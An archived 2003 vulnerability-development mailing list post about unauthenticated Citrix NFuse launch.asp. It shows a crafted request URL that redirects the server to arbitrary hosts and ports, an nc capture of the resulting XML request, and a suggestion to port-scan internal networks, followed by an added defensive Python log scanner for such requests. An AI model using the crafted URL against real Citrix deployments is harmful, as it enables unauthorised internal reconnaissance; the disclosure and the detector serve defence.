Vulnerability Development mailing list archives

lame citrix bug, anyone think of anything interesting?


From: "wirepair" <wirepair () roguemail net>
Date: Tue, 14 Oct 2003 07:34:25 -0700

lo again,
Yeah I know, I'm getting tired of Citrix too. While messing around with NFuse I found out I can basically redirect to any port on any server, using

http://nfusehost/Citrix/launch.asp?NFuse_CitrixServer=ip.ip.ip.ip&NFuse_CitrixServerPort=9000&NFuse_Transport=HTTP&NFuse_Application=Weee&NFUSE_USER=Administrator&NFuse_MIMEExtension=.ica

So I guess we could use this to do a port scan by guessing response time for ports. You could probably map the internal hosts for services and such. It's pretty weak but I guess it could help someone at some time. Oh, also you don't need to authenticate to use launch.asp...
The data it sends is:
root@jebus:/home/fbi# nc -l -v -p 9000
listening on [any] 9000 ...
connect to [my.ip.ip.ip] from (UNKNOWN) [nfuse.ip.ip.ip] 3939
POST /scripts/wpnbr.dll HTTP/1.1
Content-Type: text/xml
Host: my.ip.ip.ip:9000
Content-Length: 1100
Connection: Keep-Alive

<?xml version="1.0" encoding="UTF-16"?>
<!DOCTYPE NFuseProtocol SYSTEM "NFuse.dtd">
<NFuseProtocol version="4.1">
    <RequestAppData>
        <Scope traverse="onelevel"></Scope>
        <DesiredDetails>all</DesiredDetails>
        <AppName>Wee</AppName>
        <ServerType>all</ServerType>
        <ClientType>ica30</ClientType>
        <Credentials>
            <UserName>Administrator</UserName>
            <Password encoding="ctx1"></Password>
            <Domain type="NT"></Domain>
        </Credentials>
    </RequestAppData>
</NFuseProtocol>


Anyone else got some tricks you could possibly use this for? -wire
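A defender-side check for the behaviour described in the post, added here as an example and not part of the original message: it scans web server logs for launch.asp requests whose NFuse_CitrixServer / NFuse_CitrixServerPort values point somewhere other than the farm's own XML service. The log layout, the allowlist entry and the threshold are assumptions, and the log lines are constructed.

```python
from collections import defaultdict
from urllib.parse import parse_qs

# Assumption: the only (server, port) launch.asp should ever be pointed at.
ALLOWED_TARGETS = {("10.0.0.20", "80")}

# Constructed log lines. Assumed field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2003-10-14 14:30:01 192.0.2.10 GET /Citrix/launch.asp NFuse_CitrixServer=10.0.0.20&NFuse_CitrixServerPort=80&NFuse_Application=Notepad 200
2003-10-14 14:31:12 198.51.100.7 GET /Citrix/launch.asp NFuse_CitrixServer=10.0.0.5&NFuse_CitrixServerPort=22&NFuse_Application=Weee 200
2003-10-14 14:31:13 198.51.100.7 GET /Citrix/launch.asp nfuse_citrixserver=10.0.0.5&NFUSE_CITRIXSERVERPORT=25&NFuse_Application=Weee 200
2003-10-14 14:31:15 198.51.100.7 GET /Citrix/launch.asp NFuse_CitrixServer=10.0.0.6&NFuse_CitrixServerPort=9000&NFuse_Application=Weee 200
2003-10-14 14:32:40 192.0.2.10 GET /Citrix/default.asp - 200
"""

def launch_target(stem, query):
    """Return the (server, port) a launch.asp request names, else None."""
    if not stem.lower().endswith("/launch.asp"):
        return None
    # ASP reads query-string names case-insensitively, so normalise them.
    params = {k.lower(): v[0] for k, v in parse_qs(query).items()}
    server = params.get("nfuse_citrixserver", "")
    port = params.get("nfuse_citrixserverport", "")
    return (server, port) if (server or port) else None

def off_farm_targets(log_text, allowed=ALLOWED_TARGETS):
    """Map client IP -> sorted launch.asp targets that are not allowlisted."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue
        target = launch_target(fields[4], fields[5])
        if target and target not in allowed:
            hits[fields[2]].add(target)
    return {ip: sorted(targets) for ip, targets in hits.items()}

def likely_scanners(hits, threshold=3):
    """Clients that named `threshold` or more distinct off-farm targets."""
    return sorted(ip for ip, t in hits.items() if len(t) >= threshold)

if __name__ == "__main__":
    hits = off_farm_targets(SAMPLE_LOG)
    for ip, targets in hits.items():
        print(ip, targets)
    print("scan-like clients:", likely_scanners(hits))
```

Any hit at all is worth a look, since a normal portal session has no reason to override the server or port; many distinct targets from one client matches the port-mapping use the post describes.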

